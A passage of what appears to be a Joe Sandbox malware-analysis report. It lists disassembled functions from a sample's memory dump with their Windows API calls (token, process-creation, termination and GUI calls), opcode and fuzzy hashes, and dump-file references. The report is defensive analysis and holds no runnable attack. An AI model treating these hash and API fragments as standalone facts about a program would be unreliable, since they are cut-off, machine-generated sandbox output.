        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
        • String ID:
        • API String ID: 3050599898-0
        • Opcode ID: 23271cf0a6066d369e1b6b683bb5427166c34b0ba2bf4e252a21af0c87d1d5dd
        • Instruction ID: 8ccff20f394afafb2eb3b2b083b0120fd6f0eddc76aac5c4f007d41bbea35293
        • Opcode Fuzzy Hash: 23271cf0a6066d369e1b6b683bb5427166c34b0ba2bf4e252a21af0c87d1d5dd
        • Instruction Fuzzy Hash: 9841CFB1104345AFD721EF24DC98FBA7BB8FF55320F140629FAA8872A1C7319895DB61
        APIs
        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0023F3AB,00000000,?,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 0027824C
        • EnableWindow.USER32(?,00000000), ref: 00278272
        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 002782D1
        • ShowWindow.USER32(?,00000004), ref: 002782E5
        • EnableWindow.USER32(?,00000001), ref: 0027830B
        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0027832F
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$Show$Enable$MessageSend
        • String ID:
        • API String ID: 642888154-0
        • Opcode ID: 3e27df09401138aaf040853fb191ac2049709d3e742c11ca08da5d7b6af8141d
        • Instruction ID: 8f445315525504c610db49bfcb3d35565829ed9cf1f6c5872394672c9c0c8efb
        • Opcode Fuzzy Hash: 3e27df09401138aaf040853fb191ac2049709d3e742c11ca08da5d7b6af8141d
        • Instruction Fuzzy Hash: 5341A834641A86AFDB15CF25D89DBE47BE0FB45715F1882A9E90C4B263CB315861CF50
        APIs
        • IsWindowVisible.USER32(?), ref: 00244C95
        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00244CB2
        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00244CEA
        • _wcslen.LIBCMT ref: 00244D08
        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00244D10
        • _wcsstr.LIBVCRUNTIME ref: 00244D1A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
        • String ID:
        • API String ID: 72514467-0
        • Opcode ID: 1c832dbc9f6bbfdbdf53cbd10fe9666249b0c4fc3dd79ad4a5ad57f165fc8c77
        • Instruction ID: 97c4f5aaebc8063e8a33de95408ddff5ca3879f8305c3ffe38b8b26001da7838
        • Opcode Fuzzy Hash: 1c832dbc9f6bbfdbdf53cbd10fe9666249b0c4fc3dd79ad4a5ad57f165fc8c77
        • Instruction Fuzzy Hash: CB212632614205BBEB196F39EC89F7B7B9CDF45750F10803EF909CA192EBA1DC5186A0
        APIs
          • Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2
        • _wcslen.LIBCMT ref: 0025587B
        • CoInitialize.OLE32(00000000), ref: 00255995
        • CoCreateInstance.OLE32(0027FCF8,00000000,00000001,0027FB68,?), ref: 002559AE
        • CoUninitialize.OLE32 ref: 002559CC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
        • String ID: .lnk
        • API String ID: 3172280962-24824748
        • Opcode ID: efe8d3e8bc0ded4e2d582da325c7df6c7573b3bc828c3da6e9505b9e51eca790
        • Instruction ID: 6011796869cc342d44835254126770091a83dfead9212c1814fd9b6a5c9265f2
        • Opcode Fuzzy Hash: efe8d3e8bc0ded4e2d582da325c7df6c7573b3bc828c3da6e9505b9e51eca790
        • Instruction Fuzzy Hash: 14D16270618B119FC714DF25C494A2EBBE1EF89325F14885DF88A9B361DB31EC49CB92
        APIs
          • Part of subcall function 00240FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00240FCA
          • Part of subcall function 00240FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00240FD6
          • Part of subcall function 00240FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00240FE5
          • Part of subcall function 00240FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00240FEC
          • Part of subcall function 00240FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00241002
        • GetLengthSid.ADVAPI32(?,00000000,00241335), ref: 002417AE
        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002417BA
        • HeapAlloc.KERNEL32(00000000), ref: 002417C1
        • CopySid.ADVAPI32(00000000,00000000,?), ref: 002417DA
        • GetProcessHeap.KERNEL32(00000000,00000000,00241335), ref: 002417EE
        • HeapFree.KERNEL32(00000000), ref: 002417F5
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
        • String ID:
        • API String ID: 3008561057-0
        • Opcode ID: 23a8cc9c1d5bce006adb5af76f450e614c2450379bcc5a2af1097d02458729f0
        • Instruction ID: 9704722632d0ffbcc8f1f0132a2c012a00e9b9dba7c1676fa019e43345312876
        • Opcode Fuzzy Hash: 23a8cc9c1d5bce006adb5af76f450e614c2450379bcc5a2af1097d02458729f0
        • Instruction Fuzzy Hash: 16118E31520206FFDB189FA4DC89BAEBBB9EB45355F204028F4499B210D735A9A4CB60
        APIs
        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002414FF
        • OpenProcessToken.ADVAPI32(00000000), ref: 00241506
        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00241515
        • CloseHandle.KERNEL32(00000004), ref: 00241520
        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0024154F
        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00241563
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
        • String ID:
        • API String ID: 1413079979-0
        • Opcode ID: 4ef3c6080da498994f6e17e97a0294e0ccd7900113b31ad577b9baa0368d68e2
        • Instruction ID: 3b7f1d7eb96bf07a1785778239daabe8efdecdbc4cac222dadcf6b4e7f32368d
        • Opcode Fuzzy Hash: 4ef3c6080da498994f6e17e97a0294e0ccd7900113b31ad577b9baa0368d68e2
        • Instruction Fuzzy Hash: D3113A7250120EEBDF159FA8ED49FDE7BA9EF48744F144059FA09A2060C375CEA0DB60
        APIs
        • GetLastError.KERNEL32(?,?,00203379,00202FE5), ref: 00203390
        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0020339E
        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002033B7
        • SetLastError.KERNEL32(00000000,?,00203379,00202FE5), ref: 00203409
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorLastValue___vcrt_
        • String ID:
        • API String ID: 3852720340-0
        • Opcode ID: 12452be25b2da478d9a67b5f1089a6e62b356ad257706865d24ed69124921a5d
        • Instruction ID: 3226230621407ad8c418700aec0951143ca2ce484f8c3e7ec291b9e5185d4a09
        • Opcode Fuzzy Hash: 12452be25b2da478d9a67b5f1089a6e62b356ad257706865d24ed69124921a5d
        • Instruction Fuzzy Hash: 8A012832238312BFE7146B747CC95672A9CDB063753300269F510841F3FF224D715984
        APIs
        • GetLastError.KERNEL32(?,?,00212598,002A8B28,0000000C,00202EF8,00000001,?,?), ref: 00212D78
        • _free.LIBCMT ref: 00212DAB
        • _free.LIBCMT ref: 00212DD3
        • SetLastError.KERNEL32(00000000), ref: 00212DE0
        • SetLastError.KERNEL32(00000000), ref: 00212DEC
        • _abort.LIBCMT ref: 00212DF2
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ErrorLast$_free$_abort
        • String ID:
        • API String ID: 3160817290-0
        • Opcode ID: 6e851da56fb9051dc44b120c3e4a8395260064d88335fa98a325d74f8b0fb848
        • Instruction ID: a7343a9f824b449d9d3af3277669f5720f847aa8c0f7f5d838f13957831c0d4c
        • Opcode Fuzzy Hash: 6e851da56fb9051dc44b120c3e4a8395260064d88335fa98a325d74f8b0fb848
        • Instruction Fuzzy Hash: 64F0A931564502EBC6227B38FC0AEDA15D5ABE27B1B35041CF82C921D5EE348CF94560
        APIs
          • Part of subcall function 001F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001F9693
          • Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96A2
          • Part of subcall function 001F9639: BeginPath.GDI32(?), ref: 001F96B9
          • Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96E2
        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00278A4E
        • LineTo.GDI32(?,00000003,00000000), ref: 00278A62
        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00278A70
        • LineTo.GDI32(?,00000000,00000003), ref: 00278A80
        • EndPath.GDI32(?), ref: 00278A90
        • StrokePath.GDI32(?), ref: 00278AA0
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
        • String ID:
        • API String ID: 43455801-0
        • Opcode ID: 4f3cc5f3139d53ae91ed538308d46434fd471026bcecf0f83a695f16c5fb24c8
        • Instruction ID: eacecea16dfe1e93f11b9bff0127949b073f9736022847e061ad798a825349c4
        • Opcode Fuzzy Hash: 4f3cc5f3139d53ae91ed538308d46434fd471026bcecf0f83a695f16c5fb24c8
        • Instruction Fuzzy Hash: 03110C7604014DFFDB119F90EC4CEAA7F6DEB04350F108015BA1995161C7719D95DBA0
        APIs
        • GetDC.USER32(00000000), ref: 00245218
        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00245229
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00245230
        • ReleaseDC.USER32(00000000,00000000), ref: 00245238
        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0024524F
        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00245261
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CapsDevice$Release
        • String ID:
        • API String ID: 1035833867-0
        • Opcode ID: 5974b3791541a33eab2f8ffcf7aea4ff5a6129d186b2899007b87b635afd79ae
        • Instruction ID: 05354142796e3f4e02c3281e845563e389c67fe4ab77ae978e11cc8f156b5bd1
        • Opcode Fuzzy Hash: 5974b3791541a33eab2f8ffcf7aea4ff5a6129d186b2899007b87b635afd79ae
        • Instruction Fuzzy Hash: EB016775E00715BBEB109FB59C49E5EBFB8EF44751F144065FA08A7281D6709C10CFA0
        APIs
        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001E1BF4
        • MapVirtualKeyW.USER32(00000010,00000000), ref: 001E1BFC
        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001E1C07
        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001E1C12
        • MapVirtualKeyW.USER32(00000011,00000000), ref: 001E1C1A
        • MapVirtualKeyW.USER32(00000012,00000000), ref: 001E1C22
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Virtual
        • String ID:
        • API String ID: 4278518827-0
        • Opcode ID: 95eadea90eca87fff4b37bf6a231a3e260c77908ab92715fa1b9b1161b570828
        • Instruction ID: b054f1e66eb2e7c75201e6fc6602d5609b279c9ecf284e66120bd462527cba89
        • Opcode Fuzzy Hash: 95eadea90eca87fff4b37bf6a231a3e260c77908ab92715fa1b9b1161b570828
        • Instruction Fuzzy Hash: 69016CB09027597DE3008F6A8C85B52FFA8FF59754F00411F915C47941C7F5A864CBE5
        APIs
        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0024EB30
        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0024EB46
        • GetWindowThreadProcessId.USER32(?,?), ref: 0024EB55
        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0024EB64
        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0024EB6E
        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0024EB75
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
        • String ID:
        • API String ID: 839392675-0
        • Opcode ID: 0ef825ea744dfd352d3fd44cc7df0844d45fa5a1e2d0d8384b3137371b0e181d
        • Instruction ID: 91df6d4f8846afc6aa1ca54580e3edee3baf780c9a8395fb44686667b3c0764d
        • Opcode Fuzzy Hash: 0ef825ea744dfd352d3fd44cc7df0844d45fa5a1e2d0d8384b3137371b0e181d
        • Instruction Fuzzy Hash: A4F03A72241559BBE7215B62AC4EEEF3A7CEFCAB11F10016CF609E1091D7A05A41CAB5
        APIs
        • GetClientRect.USER32(?), ref: 00237452
        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00237469
        • GetWindowDC.USER32(?), ref: 00237475
        • GetPixel.GDI32(00000000,?,?), ref: 00237484
        • ReleaseDC.USER32(?,00000000), ref: 00237496
        • GetSysColor.USER32(00000005), ref: 002374B0
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ClientColorMessagePixelRectReleaseSendWindow
        • String ID:
        • API String ID: 272304278-0
        • Opcode ID: fc927c637a91fa1a91c15ca6763d019bc8751d489e3d8d0a4a9b63b4fa0218e8
        • Instruction ID: 3a1f0b048c7e0d0ca2ff31f499575abbbeb9a8d36587addddeab0b5e4c05a2bf
        • Opcode Fuzzy Hash: fc927c637a91fa1a91c15ca6763d019bc8751d489e3d8d0a4a9b63b4fa0218e8
        • Instruction Fuzzy Hash: 7A016D71414219EFDB616F74EC0CBAA7BB5FF44311F650168FA1AA21A1CB312E91EB50
        APIs
        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0024187F
        • UnloadUserProfile.USERENV(?,?), ref: 0024188B
        • CloseHandle.KERNEL32(?), ref: 00241894
        • CloseHandle.KERNEL32(?), ref: 0024189C
        • GetProcessHeap.KERNEL32(00000000,?), ref: 002418A5
        • HeapFree.KERNEL32(00000000), ref: 002418AC
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
        • String ID:
        • API String ID: 146765662-0
        • Opcode ID: bec7a94e58c13132e516d388615d111db4292f1ba3f85a70e8bcc7c3aa7048e5
        • Instruction ID: c55a73d0e267144ac6e2adbda5532e931647ad309c39c55e0ad706a7e9fcaa06
        • Opcode Fuzzy Hash: bec7a94e58c13132e516d388615d111db4292f1ba3f85a70e8bcc7c3aa7048e5
        • Instruction Fuzzy Hash: 3CE05276104506BBEB016BB5FD0C94ABB69FB49B22B608639F22D91471CB3294A1DB50
        APIs
        • __Init_thread_footer.LIBCMT ref: 001EBEB3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Init_thread_footer
        • String ID: D%+$D%+$D%+$D%+D%+
        • API String ID: 1385522511-4078072316
        • Opcode ID: 8311cb827c6202ee1385d23af2e762eb85410978137d4c1492cfa9e524e5c2f1
        • Instruction ID: 6a244e09194c03cdf1c4bef182ab74059298ea9a3ab07a93ce1dafc493bf5e8b
        • Opcode Fuzzy Hash: 8311cb827c6202ee1385d23af2e762eb85410978137d4c1492cfa9e524e5c2f1
        • Instruction Fuzzy Hash: DD915975A08A4ACFCB18CF9AC4D06AEB7F1FF58314F24816AD945AB351D731AD81CB90
        APIs
          • Part of subcall function 00200242: EnterCriticalSection.KERNEL32(002B070C,002B1884,?,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020024D
          • Part of subcall function 00200242: LeaveCriticalSection.KERNEL32(002B070C,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020028A
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
          • Part of subcall function 002000A3: __onexit.LIBCMT ref: 002000A9
        • __Init_thread_footer.LIBCMT ref: 00267BFB
          • Part of subcall function 002001F8: EnterCriticalSection.KERNEL32(002B070C,?,?,001F8747,002B2514), ref: 00200202
          • Part of subcall function 002001F8: LeaveCriticalSection.KERNEL32(002B070C,?,001F8747,002B2514), ref: 00200235
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
        • String ID: +T#$5$G$Variable must be of type 'Object'.
        • API String ID: 535116098-3608813932
        • Opcode ID: a496affa66f2f91c5f9e750f497bd8c2c3621dff9caeffe1a4154575ecb36c11
        • Instruction ID: fae8d92b5f472e8f20f2ff099e126c3a0e11cc6d406838ce638c4af72deeb214
        • Opcode Fuzzy Hash: a496affa66f2f91c5f9e750f497bd8c2c3621dff9caeffe1a4154575ecb36c11
        • Instruction Fuzzy Hash: AE91AE70A24209EFCB14EF54E881DBDB7B1FF49308F508459F8069B292DB71AEA5CB51
        APIs
          • Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625
        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0024C6EE
        • _wcslen.LIBCMT ref: 0024C735
        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0024C79C
        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0024C7CA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
